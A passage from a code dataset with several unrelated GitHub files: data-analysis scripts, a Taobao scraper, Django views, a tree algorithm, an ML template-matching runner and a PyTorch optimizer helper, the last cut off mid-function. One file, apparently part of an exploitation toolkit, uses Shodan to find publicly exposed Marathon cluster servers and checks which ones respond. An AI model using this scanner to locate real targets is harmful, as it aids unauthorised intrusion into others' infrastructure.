+{"seq_id":"71207297388","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Mon Feb 17 11:52:27 2020\r\n\r\n@author: TVermeire\r\n\"\"\"\r\n\r\nimport os\r\nfrom os import listdir\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\n\r\n\r\n\r\n#%%\r\n\r\npath = 'C:/Users/tvermeire/Dropbox/Doctoraat/Applied Data Mining/XAI images/Spyder/misclassifications_experiment/blur replacement 2/'\r\nfolderList = listdir(path)\r\n\r\n#%%\r\n\r\ndata = pd.DataFrame()\r\nfor name in folderList: \r\n    data = data.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet1'))\r\n\r\n#%%\r\n \r\nnp.sum(data['# images'])\r\nnp.sum(data['# misclassifications'])\r\n#%%\r\n\r\ndata_misclassified = pd.DataFrame()\r\nfor name in folderList: \r\n    data_misclassified = data_misclassified.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet2'))\r\n    \r\n#%%\r\nnp.sum(data_misclassified['# misclassified'])\r\n#%%\r\n\r\ndata_too_long = pd.DataFrame()\r\nfor name in folderList:\r\n    data_too_long = data_too_long.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet3'))\r\n\r\n\r\n#%%\r\n \r\nnp.count_nonzero(data_too_long['target score change'] < data_too_long['original class score change'])\r\nnp.argwhere(data_too_long['target score change'] < data_too_long['original class score change'])\r\nnp.count_nonzero(data_too_long['target score change'] > 0)\r\nnp.count_nonzero(data_too_long['original class score change'] > 0)\r\n\r\n\r\nnp.corrcoef(data_too_long['target score change'], data_too_long['original class score change'])\r\n\r\nnp.count_nonzero(data_too_long['original class'] == data_too_long['current class'])\r\n","repo_name":"ADMAntwerp/ImageCounterfactualExplanations","sub_path":"isedc/misclassifications_experiment_evaluation.py","file_name":"misclassifications_experiment_evaluation.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36982153160","text":"import re\nfrom web_auto import WebAutoModule\nfrom lib import FunWrap, log, sleep\n\n\nclass XuanPin(WebAutoModule):\n    def __init__(self) -> None:\n        super().__init__()\n\n    def pretreatment(self, task_name=\"\"):\n        pass\n\n    def get_number(self, temp_str):\n        return int(\"\".join(list(filter(str.isdigit, temp_str))))\n\n    @FunWrap(\"Get same-style item IDs\", True)\n    def get_same_item_id(self, same_item_url):\n        # self.open_url(same_item_url, 3)\n        elems = self.find_elems(\n            '//div[@class=\"layui-tab-item t1 layui-show\"]//td[@class=\"lxSimilarSale\"]')\n        if not elems:\n            return\n        # find the id via the parent node of the Tmall image\n        # timao_list = self.find_elems(\n        #     '//*[@class=\"layui-tab-item t1 layui-show\"]//*[@class=\"lxSimilarShop\"]/img/parent::*/input',find_time=0.1)\n        # find the id via the sibling node following the Tmall image\n        timao_list = self.find_elems(\n            '//div[@class=\"layui-tab-item t1 layui-show\"]//td[@class=\"lxSimilarShop\"]/img/following-sibling::input', find_time=0.1)\n        timao_nid_list = []\n        for e in timao_list:\n            timao_nid_list.append(e.get_attribute(\"nid\"))\n        # return\n\n        def sort_a(e):\n            return self.get_number(e.get_attribute(\"textContent\"))\n        elems.sort(key=sort_a, reverse=True)\n        nid_list = []\n        for e in elems:\n            if self.get_number(e.get_attribute(\"textContent\")) < 10:\n                break\n            parse_elem = self.driver.execute_script(\n                \"return arguments[0].parentNode\", e)\n            nid = parse_elem.get_attribute(\"nid\")\n            if nid in timao_nid_list:\n                continue\n            nid_list.append(nid)\n        print(nid_list)\n        return nid_list\n\n    
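# Added note on get_same_item_id above: candidate rows are sorted by the\n    # digits in their text (a sales count) in descending order, entries under\n    # 10 are cut off, and any nid that also appears under a Tmall shop image\n    # is skipped.\n\n    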
@FunWrap(\"获取店铺链接\", True)\n def get_store_link(self):\n elem = self.find_elem(\n '//a[@data-spm=\"d21\"]')\n if not elem:\n return\n return elem.get_attribute(\"href\")\n\n @FunWrap(\"获取店铺宝贝数量\", True)\n def get_store_item_count(self,store_link):\n self.open_url(store_link + \"search.htm?orderType=hotsell_desc\")\n elem = self.find_elem(\n '//div[@class=\"search-result\"]/span')\n if not elem:\n print(\"失败\")\n return\n return int(elem.get_attribute(\"textContent\"))\n\n @FunWrap(\"获取宝贝上架时间\", True)\n def get_item_start_date(self,item_link):\n # self.open_url(item_link + \"search.htm?orderType=hotsell_desc\")\n elem = self.find_elem(\n '//span[@class=\"eachItem shangjiaTime second\"]/span')\n if not elem:\n print(\"失败\")\n return\n print(elem.get_attribute(\"textContent\"))\n return elem.get_attribute(\"textContent\")\n\n @FunWrap(\"获取店铺销量排行的宝贝\", True)\n def get_store_hottell_item(self):\n elems = self.find_elems(\n '//span[@class=\"sale-num\"]')\n if not elems:\n print(\"失败\")\n return\n hotsell_list = []\n for e in elems:\n hotsell_list.append(int(re.sub(r\"\\D\",\"\",e.get_attribute(\"textContent\"))))\n print(re.sub(r\"\\D\",\"\",e.get_attribute(\"textContent\")))\n return hotsell_list\n\n @FunWrap(\"获取店铺新品排行的宝贝\", True)\n def get_store_new_item(self):\n elems = self.find_elems(\n '//a[@class=\"item-name J_TGoldData\"]')\n if not elems:\n print(\"失败\")\n return False\n item_link_list = []\n for e in elems:\n item_link_list.append(e.get_attribute(\"href\"))\n return item_link_list\n\n\n def main(self):\n # self.get_same_item_id(\n # \"https://item.taobao.com/item.htm?spm=a230r.1.14.22.f1a81389bpUShl&id=641341517310\")\n # self.get_store_link()\n # self.get_store_item_count(\"https://shop277088919.taobao.com/\")\n # self.get_store_hottell_item()\n # self.get_store_new_item()\n self.get_item_start_date(\"\")\n\n\nif __name__ == \"__main__\":\n print(\"网页模块测试\")\n xp = XuanPin()\n xp.main()\n","repo_name":"178me/python_demo","sub_path":"选品/xuan_pin.py","file_name":"xuan_pin.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39668370960","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.http import HttpResponseRedirect\nfrom .models import Pais, Banda, Estilo\nfrom .forms import BandaForm, EstiloForm, PaisForm\nfrom django.utils.translation import gettext, activate, get_language\n\n#devuelve el listado de paises\ndef index_pais_banda(request):\n\ttrans = translate(language='eu')\n\tlistabandas = Banda.objects.raw('SELECT * FROM( SELECT * FROM appJukeBox_Banda ORDER BY nombre DESC) GROUP BY pais_id')\n\tcontext = {'lista_banda': listabandas}\n\treturn render(request, 'index.html', context)\n\ndef translate(language): \n\tcur_language = get_language()\n\ttry :\n\t\tactivate(language)\n\t\ttext = gettext('hello')\n\tfinally :\n\t\tactivate(cur_language)\n\treturn text\n\n#devuelve los detalles de un estilo\ndef show_estilo(request, estilo_id):\n\testilo = get_object_or_404(Estilo, pk=estilo_id)\n\tbandas = estilo.banda_set.all()\n\tcontext = {'bandas': bandas, 'estilo': estilo}\n\treturn render(request, \"estilo.html\", context)\n\n#devuelve las bandas de un pais\ndef index_bandas(request):\n\tbandas = get_list_or_404(Banda.objects.order_by('nombre'))\n\tcontext = {'bandas': bandas}\n\treturn render(request, 'bandas.html', context)\n\n#devuelve los detalles de una banda\ndef show_banda(request, banda_id):\n\tbanda = 
get_object_or_404(Banda, pk=banda_id)\n\testilos = banda.estilos.all()\n\tcontext = {'banda': banda, 'estilos': estilos}\n\treturn render(request, 'banda.html', context)\n\n#devuelve los datos de un pais\ndef show_pais(request, pais_id):\n\tpais = get_object_or_404(Pais, pk=pais_id)\n\tbandas = pais.banda_set.all()\n\tcontext = {'pais': pais, 'bandas': bandas}\n\treturn render(request, 'pais.html', context)\n\n#devuelve la lista de paises\ndef index_paises(request):\n\tpaises = get_list_or_404(Pais.objects.order_by('nombre'))\n\tcontext = {'paises': paises}\n\treturn render(request, 'paises.html', context)\n\n#devuelve las bandas de un pais\ndef index_estilos(request):\n\testilos = get_list_or_404(Estilo.objects.order_by('nombre'))\n\tcontext = {'estilos': estilos}\n\treturn render(request, 'estilos.html', context)\n\ndef upload_banda(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = BandaForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_banda?submitted=True\")\n\t\n\telse:\n\t\tform = BandaForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_banda.html', context)\n\ndef upload_estilo(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = EstiloForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_estilo?submitted=True\")\n\t\n\telse:\n\t\tform = EstiloForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_estilo.html', context)\n\ndef upload_pais(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = PaisForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_pais?submitted=True\")\n\t\n\telse:\n\t\tform = PaisForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_pais.html', context)","repo_name":"unaiLarra/jukeBox","sub_path":"appJukeBox/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18957237887","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Tree(object):\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = TreeNode(item)\n if not self.root:\n self.root = node\n else:\n queue = [self.root]\n while True:\n pop_node = queue.pop(0)\n if not pop_node.left:\n pop_node.left = node\n return\n elif not pop_node.right:\n pop_node.right = node\n return\n else:\n queue.append(pop_node.left)\n queue.append(pop_node.right)\n\n\nclass Solution(object):\n\n def levelOrderBottom(self, root):\n if not root:\n return []\n result = [[root.val]]\n stack = [root]\n while len(stack) != 0:\n temp_stack = []\n for data in stack:\n if not data.left and not data.right:\n continue\n if data.left:\n temp_stack.append(data.left)\n if data.right:\n temp_stack.append(data.right)\n stack = temp_stack\n if len(stack)!=0:\n result.insert(0, [s.val for s in stack])\n return result\n\n\nif __name__ == '__main__':\n tree = Tree()\n for i in range(1, 11):\n tree.add(i)\n solution = Solution()\n result = 
solution.levelOrderBottom(tree.root)\n    print(result)\n","repo_name":"bobowang2017/python_study","sub_path":"algorithm/leetcode/1/107二叉树的层次遍历II.py","file_name":"107二叉树的层次遍历II.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73203849068","text":"import shodan\nimport sys\nimport configparser\nimport requests\nimport threading\nimport queue\n\n\nconfig = configparser.ConfigParser()\nconfig.read('conf.ini')\n\n# Get testing value\ntest = config.getboolean('shodan', 'test')\n\nif test:\n    test_url = config.get('shodan', 'test_url')\n\n# Get Shodan API key\nSHODAN_API_KEY = config.get('shodan', 'key')\napi = shodan.Shodan(SHODAN_API_KEY)\n\n# Get number of threads to use\nNUMT = config.get('shodan', 'NUMT')\n\nq = queue.Queue()\nsan = queue.Queue()\n\n\n'''\nSearch results using Shodan API\n'''\ndef search():\n    try:\n        results = api.search('X-Marathon-Leader')\n        for result in results['matches']:\n            try:\n                ip = result['http']['host']\n                ip_str = result['ip_str']\n                if ip != ip_str:\n                    ip = ip_str\n                port = str(result['port'])\n                loc = result['http']['location']\n                if port == '443':\n                    url = 'https://' + ip + loc\n                elif port == '8443':\n                    url = 'https://' + ip + ':' + port + loc\n                else:\n                    url = 'http://' + ip + ':' + port + loc\n                q.put(url)\n            except KeyError:\n                continue\n\n    except shodan.APIError as e:\n        print('Error: {}'.format(e))\n\n\n'''\nSanitize list, remove not 200 OK URLs\n'''\ndef sanitize():\n    url = q.get()\n    try:\n        status = requests.get(url, timeout=5, verify=False).status_code\n        if status == 200:\n            san.put(url)\n    except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:\n        return\n\n\n'''\nProducer work\n'''\ndef producer():\n    try:\n        search()\n    except (OSError, KeyboardInterrupt):\n        sys.exit(0)\n\n\n'''\nConsumer work\n'''\ndef consumer():\n    while not q.empty():\n        sanitize()\n\n\n'''\nStart threads function\n'''\ndef startThreads():\n    p = threading.Thread(target=producer)\n    consumers = [threading.Thread(target = consumer) for i in range(int(NUMT))]\n\n    p.daemon = True\n    p.start()\n    p.join()\n    for c in consumers:\n        c.daemon = True\n        c.start()\n    for c in consumers:\n        c.join()\n\n\ndef start():\n    if test:\n        return [test_url]\n    startThreads()\n    l = []\n    while not san.empty():\n        v = san.get()\n        l.append(v)\n    return l\n","repo_name":"b3d3c/BDsploit","sub_path":"shodan_thread.py","file_name":"shodan_thread.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"19114852987","text":"# -*- coding: utf-8 -*-\nfrom lightsite import models\n'''\nМодуль, отвечающий за получение данных из БД\n'''\n\ndef getAllLogos ():\n    '''\n    :returns ({'companyId' : companyId,\n                'logoId' : logoId,\n                'photoPath' : logoPhotoPath\n                'kpFilePath' : kpFileName, \n                'descFilePath' : descFilePath\n                }, ...)\n    \n    !!! 
ДОЛЖЕН БЫТЬ ОТСОРТИРОВАН ПО companyId !!!\n '''\n \n return [{'companyId' : logo.company.id,\n 'logoId' : logo.id,\n 'photoPath' : logo.photo.path,\n 'kpFilePath' : logo.serial_kp_file.path,\n 'descFilePath': logo.serial_desc_file.path} for logo in models.CompanyLogo.objects.all().order_by('company') if logo.serial_kp_file and logo.serial_desc_file]\n \ndef addLogoStatistic (logoId, pos):\n '''\n Сохранение результатов поиска\n \n @param: logoId - идентификатор companyLogo\n @param: position - позиция в результате\n '''\n l = models.CompanyLogo.objects.get(pk=logoId)\n if not l:\n raise Exception('Company logo with id = %s does not exists' % logoId)\n if not pos:\n raise Exception('Position can not be %s' % pos)\n row = models.LogoStatistic(logo=l, position=pos)\n row.save()","repo_name":"abryazgin/detector","sub_path":"deta/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25554029729","text":"\"\"\"\"\"\nThis script downloads the data needed for analysis from the Minsa database.\n It uses series that are in the yaml config file.\n\"\"\"\n\nfrom datetime import date\nimport urllib\nfrom urllib import request\nimport os\nimport progressbar\nimport src.utilities as utils\n\n\n\ndef create_path():\n \n config = utils.read_config()\n # Get date for the filename.\n today = date.today()\n date_str = today.strftime(\"%b_%d_%Y\")\n \n # Define the filename and path to download it.\n path = os.path.join(config['data']['rawFilePath'], f'fallecidos_sinadef_{date_str}.csv')\n return path\n\ndef check_path_existance(path):\n \n \"\"\"\n Iterate over files in that directory \n to see if it already exists.\n \"\"\"\n config = utils.read_config()\n for item in os.scandir(config['data']['rawFilePath']):\n if item.is_file():\n if item.name in path:\n print(\"\\nFile already up-to-date.\")\n print(f\"File found: {item.name}\\n\")\n break\n \n else:\n download_raw_data(path)\n \ndef download_raw_data(path):\n \n print(\"\\nDownloading file...\\n'\")\n # Define url to download the file from.\n url = 'https://cloud.minsa.gob.pe/s/nqF2irNbFomCLaa/download'\n \n # Open url to avoid Error 403 (forbidden)\n opener = urllib.request.URLopener()\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n \n # Download file.\n opener.retrieve(url, path, show_progress)\n print('Download finished.\\n')\n \npbar = None\n\ndef show_progress(block_num, block_size, total_size):\n \"\"\" ProgressBar setting. 
(for UX)\"\"\"\n \n global pbar \n if pbar is None:\n pbar = progressbar.ProgressBar(maxval=total_size)\n pbar.start()\n\n downloaded = block_num * block_size\n if downloaded < total_size:\n pbar.update(downloaded)\n else:\n pbar.finish()\n pbar = None \n\n\ndef main():\n path = create_path()\n check_path_existance(path)\n \nif __name__ == \"__main__\":\n main() \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"leo-padron/Exploratory-Data-Analysis-Peru-Covid-Casualties","sub_path":"src/download_raw_data.py","file_name":"download_raw_data.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11255810922","text":"import numpy as np\nimport os\nimport momentnet\nimport random\nimport tensorflow as tf\nimport json\nimport dataformat\nimport shutil\nfrom array import array\n\nweight_set_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"weight_sets\")\nweight_sets = []\n\n\ndef discover_weight_set():\n weight_sets.clear()\n for name in os.listdir(weight_set_path):\n pwd = os.path.join(weight_set_path, name)\n set_file = os.path.join(pwd, \"set.json\")\n if os.path.isdir(pwd) and os.path.exists(set_file):\n with open(set_file, \"r\") as file:\n set_data = json.load(file)\n weight_sets.append(set_data)\n\n\ndiscover_weight_set()\n\n\ntemplate_set_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"templates\")\ntemplate_paths = []\n\n\ndef discover_template_set():\n template_paths.clear()\n for name in os.listdir(template_set_path):\n pwd = os.path.join(template_set_path, name)\n if os.path.isdir(pwd):\n template_paths.append(name)\n\n\ndiscover_template_set()\n\n\nclass Runner:\n\n def __init__(self):\n self.running = False\n self.setup(0)\n self.change_template(0)\n self.collect_template_flag = -1\n\n def change_template(self, template_index):\n if len(template_paths) < template_index:\n return False\n self.template_index = template_index\n self.templates, self.template_labels = dataformat.read_template_directory(self.formatter, os.path.join(template_set_path, template_paths[self.template_index]), with_flip=True)\n print(template_paths[self.template_index])\n return True\n\n def setup(self, index):\n self.index = index\n if len(weight_sets) <= self.index:\n return False\n s = weight_sets[self.index][\"size\"]\n self.size = (s[0], s[1])\n self.num_layers = weight_sets[self.index][\"num_layers\"]\n self.session_name = \"weight_sets/\" + weight_sets[self.index][\"session_name\"]\n\n self.formatter = dataformat.DataFormat(self.size[0])\n\n self.close_down()\n\n print(self.session_name)\n num_intra_class = 10\n num_inter_class = 20\n self.comparator = momentnet.Comparator((2, self.size[0]), self.size[1], num_intra_class=num_intra_class, num_inter_class=num_inter_class, layers=self.num_layers)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.running = True\n self.sess = tf.Session(config=config)\n self.sess.run(tf.global_variables_initializer())\n self.comparator.load_session(self.sess, self.session_name)\n return True\n\n def process(self, frames):\n if not self.running:\n return None\n\n if isinstance(frames, list):\n data = np.zeros([len(frames), 2, self.size[0]], dtype=np.float32)\n for i, frame in enumerate(frames):\n data[i, ...] 
= self.formatter.format(frame)\n c, raw = self.comparator.process(self.sess, np.reshape(data, [-1, self.size[0] * 2]), np.reshape(self.templates, [-1, self.size[0] * 2]))\n raw = raw[:, c].flatten()\n classes = self.template_labels[c, 0]\n flip_or_not = self.template_labels[c, 1]\n\n else:\n frame = frames\n data = self.formatter.format(frame)\n c, raw = self.comparator.process(self.sess, np.reshape(data, [-1, self.size[0] * 2]), np.reshape(self.templates, [-1, self.size[0] * 2]))\n raw = raw[:, c].flatten()\n classes = self.template_labels[c, 0]\n flip_or_not = self.template_labels[c, 1]\n if self.collect_template_flag >= 0:\n print(self.collect_template_flag)\n dataformat.write_to_template_directory(frame, random.randint(0, 100000), self.collect_template_flag, self.formatter, template_paths[self.template_index])\n self.collect_template_flag = -1\n\n return classes, raw, flip_or_not\n\n def raise_template_flag(self, label):\n print(label)\n self.collect_template_flag = int(label)\n\n def close_down(self):\n if self.running:\n self.sess.close()\n tf.reset_default_graph()\n self.running = False\n\n def get_weight_sets(self):\n discover_weight_set()\n return weight_sets, self.index\n\n def get_template_sets(self):\n discover_template_set()\n return template_paths, self.template_index\n\n def archive_selected(self):\n artifact_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"artifacts\")\n pack_dir = os.path.join(artifact_dir, \"pack\")\n if os.path.exists(pack_dir):\n shutil.rmtree(os.path.join(artifact_dir, \"pack\"))\n os.makedirs(os.path.join(artifact_dir, \"pack\"))\n weight_path = \"/\".join(weight_sets[self.index][\"session_name\"].split(\"/\")[:-1])\n print(weight_path)\n shutil.copytree(os.path.join(weight_set_path, weight_path), os.path.join(artifact_dir, \"pack\", weight_path))\n shutil.copytree(os.path.join(template_set_path, template_paths[self.template_index]), os.path.join(artifact_dir, \"pack\", \"templates\"))\n shutil.make_archive(os.path.join(artifact_dir, \"pack\"), 'gztar', os.path.join(artifact_dir, \"pack\"))\n return os.path.join(artifact_dir, \"pack.tar.gz\")\n\n def save_weight_for_web_download(self):\n if not self.running:\n return None\n\n weights = self.comparator.get_weights(self.sess, np.reshape(self.templates, [-1, self.size[0] * 2]))\n weights.append(self.template_labels[:, 0])\n\n web_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"web\")\n model_dir = os.path.join(web_dir, \"model\")\n if os.path.exists(model_dir):\n shutil.rmtree(model_dir)\n os.makedirs(model_dir)\n\n write_model_weight(web_dir, weights, \"model/model\")\n\n\ndef write_model_weight(root, weights, name):\n outfile_name = name + \".json\"\n with open(os.path.join(root, outfile_name), 'w') as outfile:\n\n data = []\n for i, w in enumerate(weights):\n if isinstance(w, list):\n child_file_name = write_model_weight(root, w, name + \"_\" + str(i))\n data.append({\"t\": \"n\",\n \"path\": child_file_name})\n else:\n child_file_name = name + \"_\" + str(i) + \".bin\"\n with open(os.path.join(root, child_file_name), 'wb') as child_output:\n if w.dtype == np.int32:\n array('i', w.astype(np.int32).flatten().tolist()).tofile(child_output)\n data.append({\"t\": \"i\",\n \"shape\": w.shape,\n \"path\": child_file_name})\n else:\n array('f', w.astype(np.float32).flatten().tolist()).tofile(child_output)\n data.append({\"t\": \"f\",\n \"shape\": w.shape,\n \"path\": child_file_name})\n\n print(\"writing to \", outfile_name)\n json.dump(data, outfile)\n return 
outfile_name\n\n\nif __name__ == '__main__':\n\n for weight in weight_sets:\n print(weight)\n\n for path in template_paths:\n print(path)\n","repo_name":"bitstudio/zodiac_google","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"40949744547","text":"# -*- coding: utf-8 -*-\n\n\n\nfrom ipaddress import ip_address\n\n\ndef find_n_ip(ip_from_range1, range1, range2):\n range_list = \"-\".join([range1, range2]).split(\"-\")\n start1, end1, start2, end2 = [ip_address(i) for i in range_list]\n\n ip = ip_address(ip_from_range1)\n\n current_ip = start1\n index = 0\n while True:\n if current_ip == ip:\n break\n elif current_ip > end1:\n raise ValueError(f\"IP {ip} не в диапазоне {range1}\")\n index += 1\n current_ip += 1\n\n match_ip = start2\n for _ in range(index):\n match_ip += 1\n if match_ip > end2:\n raise ValueError(f\"Найденный IP {match_ip} не в диапазоне {range2}\")\n return str(match_ip)\n\n\ndef find_n_ip(ip_from_range1, range1, range2):\n range_list = \"-\".join([range1, range2]).split(\"-\")\n start1, end1, start2, end2 = [int(ip_address(i)) for i in range_list]\n ip = int(ip_address(ip_from_range1))\n if ip > end1:\n raise ValueError(f\"IP {ip} не в диапазоне {range1}\")\n\n index = ip - start1\n match_ip = start2 + index\n if match_ip > end2:\n raise ValueError(f\"Найденный IP {match_ip} не в диапазоне {range2}\")\n return str(ip_address(match_ip))\n\n\nif __name__ == \"__main__\":\n print(find_n_ip(\"10.1.1.127\", \"10.1.1.100-10.1.2.200\", \"50.1.1.110-50.1.2.210\"))\n","repo_name":"natenka/pyneng-tasks-solutions","sub_path":"answers/12_useful_modules/task_12_4.py","file_name":"task_12_4.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26364346496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2022/07/07\n\n@author: Junjie Chen\n\n如果类B的某个成员self.fa是类A的实例a, 则如果B中更改了a的某个属性, 则a的那个属性也会变.\n\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport collections\nfrom transformers import optimization\n\n#内存分析工具\nfrom memory_profiler import profile\nimport objgraph\nimport gc\n\nimport matplotlib\n# matplotlib.use('TkAgg')\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nfrom pylab import tick_params\nimport copy\nfrom matplotlib.pyplot import MultipleLocator\n\n\n# 本项目自己编写的库\n# from ColorPrint import ColoPrint\n# color = ColoPrint()\n# sys.path.append(\"..\")\n# from Option import args\n\n\nfontpath = \"/usr/share/fonts/truetype/windows/\"\nfontpath1 = \"/usr/share/fonts/truetype/msttcorefonts/\"\nfontpath2 = \"/usr/share/fonts/truetype/NerdFonts/\"\n\n\nclass net(nn.Module):\n def __init__(self):\n super(net,self).__init__()\n self.fc = nn.Linear(1,10)\n def forward(self,x):\n return self.fc(x)\n\n\ndef make_optimizer(args, net, compr = '', snr = ''):\n\n '''\n make optimizer and scheduler together\n '''\n # optimizer\n # filter() 函数用于过滤序列,过滤掉不符合条件的元素,返回一个迭代器对象,如果要转换为列表,可以使用 list() 来转换。\n # 该接收两个参数,第一个为函数,第二个为序列,序列的每个元素作为参数传递给函数进行判断,然后返回 True 或 False,最后将返回 True 的元素放到新列表中。\n trainable = filter(lambda x: x.requires_grad, net.parameters())\n\n # trainable = net.parameters()\n # lr = 1e-4, weight_decay = 0\n kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}\n\n # optimizer = ADAM\n if args.optimizer == 'SGD':\n 
optimizer_class = torch.optim.SGD\n kwargs_optimizer['momentum'] = args.momentum\n elif args.optimizer == 'ADAM':\n optimizer_class = torch.optim.Adam\n kwargs_optimizer['betas'] = args.betas # (0.9, 0.999)\n kwargs_optimizer['eps'] = args.epsilon # 1e-8\n elif args.optimizer == 'RMSprop':\n optimizer_class = torch.optim.RMSprop\n kwargs_optimizer['eps'] = args.epsilon\n\n # scheduler, milestones = 0, gamma = 0.5\n milestones = list(map(lambda x: int(x), args.decay.split('-'))) # [20, 40, 60, 80, 100, 120]\n kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma} # args.gamma =0.5\n scheduler_class = torch.optim.lr_scheduler.MultiStepLR\n\n # warmup_class = optimization.get_polynomial_decay_schedule_with_warmup\n # kwargs_warmup = {\"num_warmup_steps\":args.warm_up_ratio*total_steps, \"num_training_steps\":total_steps,\"power\":args.power,\"lr_end\":args.lr_end}\n\n class CustomOptimizer(optimizer_class):\n def __init__(self, *args, **kwargs):\n super(CustomOptimizer, self).__init__(*args, **kwargs)\n self.lr = []\n self.cn = self.__class__.__name__\n return\n\n def _register_scheduler(self, scheduler_class, **kwargs):\n self.scheduler = scheduler_class(self, **kwargs)\n\n def schedule(self):\n self.scheduler.step()\n\n def get_lr(self):\n return self.scheduler.get_lr()[0]\n\n def get_last_epoch(self):\n return self.scheduler.last_epoch\n\n def updatelr(self):\n lr = self.get_lr()\n self.lr.append(lr)\n return lr\n\n def save_lr(self, path, compr = '', tra_snr = 'random'):\n\n if compr != '' :\n basename = f\"_{self.cn}_compr={compr:.1f}_trainSnr={tra_snr}(dB)\"\n else:\n basename = f\"_{self.cn}\"\n torch.save(self.lr, os.path.join(path, f\"lr{basename}.pt\"))\n self.plot_lr(self.lr, path, compr = compr, snr = tra_snr)\n return\n\n def reset_state(self):\n self.state = collections.defaultdict(dict)\n self.scheduler.last_epoch = 0\n #self.scheduler._last_lr = 0\n for param_group in self.param_groups:\n param_group[\"lr\"] = args.lr\n\n milestones = list(map(lambda x: int(x), args.decay.split('-'))) # [20, 40, 60, 80, 100, 120]\n kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma} # args.gamma =0.5\n self.scheduler = scheduler_class(self, **kwargs_scheduler)\n\n # kwargs_warmup = {\"num_warmup_steps\":args.warm_up_ratio*total_steps, \"num_training_steps\":total_steps,\"power\":args.power,\"lr_end\":args.lr_end}\n # self.scheduler = warmup_class(self, **kwargs_warmup)\n return\n\n # 在不同的画布中画各个损失函数的结果.\n def plot_lr(self, Lr, savepath, compr = '', snr = ''):\n if compr != '' :\n basename = f\"_{self.cn}_compr={compr:.1f}_trainSnr={snr}(dB)\"\n title = r'$\\mathrm{{R}}={:.1f},\\mathrm{{SNR}}_\\mathrm{{train}} = {}\\mathrm{{(dB)}}$'.format(compr, snr)\n else:\n basename = f\"_{self.cn}\"\n title = ''\n epoch = len(Lr)\n X = np.linspace(1, epoch, epoch)\n\n fig = plt.figure(figsize=(6, 5), constrained_layout=True)\n font = FontProperties(fname=fontpath1+\"Times_New_Roman.ttf\", size = 20)\n plt.plot(X, Lr, )\n plt.xlabel('Epoch',fontproperties=font)\n plt.ylabel('Learning rate',fontproperties=font)\n #plt.title(label,fontproperties=font)\n #plt.grid(True)\n\n # font1 = {'family':'Times New Roman','style':'normal','size':16}\n # legend1 = plt.legend(loc='best', borderaxespad=0, edgecolor='black', prop=font1,)\n # frame1 = legend1.get_frame()\n # frame1.set_alpha(1)\n # frame1.set_facecolor('none') # 设置图例legend背景透明\n\n ax=plt.gca()\n 